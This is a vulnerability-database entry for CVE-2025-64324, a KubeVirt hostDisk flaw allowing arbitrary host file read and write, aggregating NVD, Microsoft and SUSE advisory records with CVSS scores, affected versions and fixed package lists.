Vulnerability-Lookup

CVE-2025-64324 (GCVE-0-2025-64324)

Vulnerability from cvelistv5 – Published: 2025-11-18 22:10 – Updated: 2025-11-20 04:55

Title

KubeVirt Vulnerable to Arbitrary Host File Read and Write

Summary

KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn't exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.

Severity ?

8.5 (High)


                        
                          CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
CWE-732 - Incorrect Permission Assignment for Critical Resource

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	kubevirt	kubevirt	Affected: 0 , < 1.6.1 (custom) Affected: 1.7.0-alpha.0 , < 1.7.0-rc.0 (custom)

FKIE_CVE-2025-64324

Vulnerability from fkie_nvd - Published: 2025-11-18 23:15 - Updated: 2025-11-25 17:16

Severity ?

7.7 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/kubevirt/kubevirt/commit/00d03e43e3bf03e563136695a4732b65ed42d764	Patch
security-advisories@github.com	https://github.com/kubevirt/kubevirt/commit/ff3b69b08b6b9c8d08d23735ca8d82455f790a69	Patch
security-advisories@github.com	https://github.com/kubevirt/kubevirt/pull/15037	Issue Tracking
security-advisories@github.com	https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
kubevirt	kubevirt	*
kubevirt	kubevirt	1.7.0
kubevirt	kubevirt	1.7.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
              "matchCriteriaId": "734D7F12-338C-477B-90F1-36641690CE7E",
              "versionEndExcluding": "1.6.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.7.0:alpha0:*:*:*:kubernetes:*:*",
              "matchCriteriaId": "6C13B76B-290B-4D75-AF75-54FEC43B75C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.7.0:beta0:*:*:*:kubernetes:*:*",
              "matchCriteriaId": "870D3714-CE8E-4D20-942F-7DD43D88F782",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue."
    }
  ],
  "id": "CVE-2025-64324",
  "lastModified": "2025-11-25T17:16:59.607",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "NONE",
          "baseScore": 7.7,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.5,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "LOCAL",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.5,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-11-18T23:15:55.293",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/kubevirt/kubevirt/commit/00d03e43e3bf03e563136695a4732b65ed42d764"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/kubevirt/kubevirt/commit/ff3b69b08b6b9c8d08d23735ca8d82455f790a69"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/kubevirt/kubevirt/pull/15037"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        },
        {
          "lang": "en",
          "value": "CWE-732"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

MSRC_CVE-2025-64324

Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2025-12-17 14:35

Summary

KubeVirt Vulnerable to Arbitrary Host File Read and Write

Notes

Additional Resources

To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle

Disclaimer

The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

JSON

To clipboard

{
  "document": {
    "category": "csaf_vex",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Public",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en-US",
    "notes": [
      {
        "category": "general",
        "text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
        "title": "Additional Resources"
      },
      {
        "category": "legal_disclaimer",
        "text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
        "title": "Disclaimer"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "secure@microsoft.com",
      "name": "Microsoft Security Response Center",
      "namespace": "https://msrc.microsoft.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "CVE-2025-64324 KubeVirt Vulnerable to Arbitrary Host File Read and Write - VEX",
        "url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64324.json"
      },
      {
        "category": "external",
        "summary": "Microsoft Support Lifecycle",
        "url": "https://support.microsoft.com/lifecycle"
      },
      {
        "category": "external",
        "summary": "Common Vulnerability Scoring System",
        "url": "https://www.first.org/cvss"
      }
    ],
    "title": "KubeVirt Vulnerable to Arbitrary Host File Read and Write",
    "tracking": {
      "current_release_date": "2025-12-17T14:35:11.000Z",
      "generator": {
        "date": "2026-01-03T09:42:28.039Z",
        "engine": {
          "name": "MSRC Generator",
          "version": "1.0"
        }
      },
      "id": "msrc_CVE-2025-64324",
      "initial_release_date": "2025-11-02T00:00:00.000Z",
      "revision_history": [
        {
          "date": "2025-11-20T01:01:32.000Z",
          "legacy_version": "1",
          "number": "1",
          "summary": "Information published."
        },
        {
          "date": "2025-11-22T14:36:00.000Z",
          "legacy_version": "2",
          "number": "2",
          "summary": "Information published."
        },
        {
          "date": "2025-12-07T01:36:59.000Z",
          "legacy_version": "3",
          "number": "3",
          "summary": "Information published."
        },
        {
          "date": "2025-12-17T14:35:11.000Z",
          "legacy_version": "4",
          "number": "4",
          "summary": "Information published."
        }
      ],
      "status": "final",
      "version": "4"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "3.0",
                "product": {
                  "name": "Azure Linux 3.0",
                  "product_id": "17084"
                }
              },
              {
                "category": "product_version",
                "name": "2.0",
                "product": {
                  "name": "CBL Mariner 2.0",
                  "product_id": "17086"
                }
              }
            ],
            "category": "product_name",
            "name": "Azure Linux"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003cazl3 kubevirt 1.5.3-2",
                "product": {
                  "name": "\u003cazl3 kubevirt 1.5.3-2",
                  "product_id": "1"
                }
              },
              {
                "category": "product_version",
                "name": "azl3 kubevirt 1.5.3-2",
                "product": {
                  "name": "azl3 kubevirt 1.5.3-2",
                  "product_id": "20673"
                }
              },
              {
                "category": "product_version_range",
                "name": "azl3 kubevirt 1.5.0-5",
                "product": {
                  "name": "azl3 kubevirt 1.5.0-5",
                  "product_id": "2"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003ccbl2 kubevirt 0.59.0-30",
                "product": {
                  "name": "\u003ccbl2 kubevirt 0.59.0-30",
                  "product_id": "3"
                }
              },
              {
                "category": "product_version",
                "name": "cbl2 kubevirt 0.59.0-30",
                "product": {
                  "name": "cbl2 kubevirt 0.59.0-30",
                  "product_id": "20390"
                }
              }
            ],
            "category": "product_name",
            "name": "kubevirt"
          }
        ],
        "category": "vendor",
        "name": "Microsoft"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "\u003cazl3 kubevirt 1.5.3-2 as a component of Azure Linux 3.0",
          "product_id": "17084-1"
        },
        "product_reference": "1",
        "relates_to_product_reference": "17084"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "azl3 kubevirt 1.5.3-2 as a component of Azure Linux 3.0",
          "product_id": "20673-17084"
        },
        "product_reference": "20673",
        "relates_to_product_reference": "17084"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
          "product_id": "17084-2"
        },
        "product_reference": "2",
        "relates_to_product_reference": "17084"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "\u003ccbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
          "product_id": "17086-3"
        },
        "product_reference": "3",
        "relates_to_product_reference": "17086"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
          "product_id": "20390-17086"
        },
        "product_reference": "20390",
        "relates_to_product_reference": "17086"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-64324",
      "cwe": {
        "id": "CWE-200",
        "name": "Exposure of Sensitive Information to an Unauthorized Actor"
      },
      "notes": [
        {
          "category": "general",
          "text": "GitHub_M",
          "title": "Assigning CNA"
        }
      ],
      "product_status": {
        "fixed": [
          "20673-17084",
          "20390-17086"
        ],
        "known_affected": [
          "17084-1",
          "17084-2",
          "17086-3"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-64324 KubeVirt Vulnerable to Arbitrary Host File Read and Write - VEX",
          "url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64324.json"
        }
      ],
      "remediations": [
        {
          "category": "none_available",
          "date": "2025-11-20T01:01:32.000Z",
          "details": "There is no fix available for this vulnerability as of now",
          "product_ids": [
            "17084-2"
          ]
        },
        {
          "category": "vendor_fix",
          "date": "2025-11-20T01:01:32.000Z",
          "details": "1.5.3-3:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
          "product_ids": [
            "17084-1"
          ],
          "url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
        },
        {
          "category": "vendor_fix",
          "date": "2025-11-20T01:01:32.000Z",
          "details": "0.59.0-31:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
          "product_ids": [
            "17086-3"
          ],
          "url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
        }
      ],
      "title": "KubeVirt Vulnerable to Arbitrary Host File Read and Write"
    }
  ]
}

SUSE-SU-2025:4330-1

Vulnerability from csaf_suse - Published: 2025-12-09 11:33 - Updated: 2025-12-09 11:33

Summary

Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container

Notes

Title of the patch

Description of the patch

This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container fixes the following issues: Updated kubevirt to version 1.6.3: - CVE-2025-22872: Fixed incorrect interpretation of tags leading content to be placed wrong scope during DOM construction in golang.org/x/net/html (bsc#1241772) - CVE-2025-64432: Fixed bypass of RBAC controls due to incorrect validation of certain fields in the client TLS certificate (bsc#1253181) - CVE-2025-64433: Fixed arbitrary files read via improper symlink handling (bsc#1253185) - CVE-2025-64434: Fixed privilege escalation via virt-api impersonification due to compromise virt-handler instance (bsc#1253186) - CVE-2025-64437: Fixed mishandling of symlinks (bsc#1253194) - CVE-2025-64324: Fixed a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users (bsc#1253748)

Patchnames

SUSE-2025-4330,SUSE-SLE-Module-Containers-15-SP7-2025-4330

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container fixes the following issues:\n\nUpdated kubevirt to version 1.6.3:\n\n  - CVE-2025-22872: Fixed incorrect interpretation of tags leading content to be placed wrong scope during DOM \n    construction in golang.org/x/net/html (bsc#1241772)\n  - CVE-2025-64432: Fixed bypass of RBAC controls due to incorrect validation of certain fields in the client\n    TLS certificate (bsc#1253181)\n  - CVE-2025-64433: Fixed arbitrary files read via improper symlink handling (bsc#1253185)\n  - CVE-2025-64434: Fixed privilege escalation via virt-api impersonification due to compromise virt-handler\n    instance (bsc#1253186)\n  - CVE-2025-64437: Fixed mishandling of symlinks (bsc#1253194)\n  - CVE-2025-64324: Fixed a logic bug that allows an attacker to read and write arbitrary files owned by more\n    privileged users (bsc#1253748)\n\n",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "SUSE-2025-4330,SUSE-SLE-Module-Containers-15-SP7-2025-4330",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_4330-1.json"
      },
      {
        "category": "self",
        "summary": "URL for SUSE-SU-2025:4330-1",
        "url": "https://www.suse.com/support/update/announcement/2025/suse-su-20254330-1/"
      },
      {
        "category": "self",
        "summary": "E-Mail link for SUSE-SU-2025:4330-1",
        "url": "https://lists.suse.com/pipermail/sle-security-updates/2025-December/023449.html"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1241772",
        "url": "https://bugzilla.suse.com/1241772"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1250683",
        "url": "https://bugzilla.suse.com/1250683"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1253181",
        "url": "https://bugzilla.suse.com/1253181"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1253185",
        "url": "https://bugzilla.suse.com/1253185"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1253186",
        "url": "https://bugzilla.suse.com/1253186"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1253194",
        "url": "https://bugzilla.suse.com/1253194"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1253384",
        "url": "https://bugzilla.suse.com/1253384"
      },
      {
        "category": "self",
        "summary": "SUSE Bug 1253748",
        "url": "https://bugzilla.suse.com/1253748"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-22872 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-22872/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64324 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64324/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64432 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64432/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64433 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64433/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64434 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64434/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-64437 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-64437/"
      }
    ],
    "title": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
    "tracking": {
      "current_release_date": "2025-12-09T11:33:55Z",
      "generator": {
        "date": "2025-12-09T11:33:55Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "SUSE-SU-2025:4330-1",
      "initial_release_date": "2025-12-09T11:33:55Z",
      "revision_history": [
        {
          "date": "2025-12-09T11:33:55Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
                "product": {
                  "name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
                  "product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
                "product": {
                  "name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
                  "product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "SUSE Linux Enterprise Module for Containers 15 SP7",
                "product": {
                  "name": "SUSE Linux Enterprise Module for Containers 15 SP7",
                  "product_id": "SUSE Linux Enterprise Module for Containers 15 SP7",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:suse:sle-module-containers:15:sp7"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
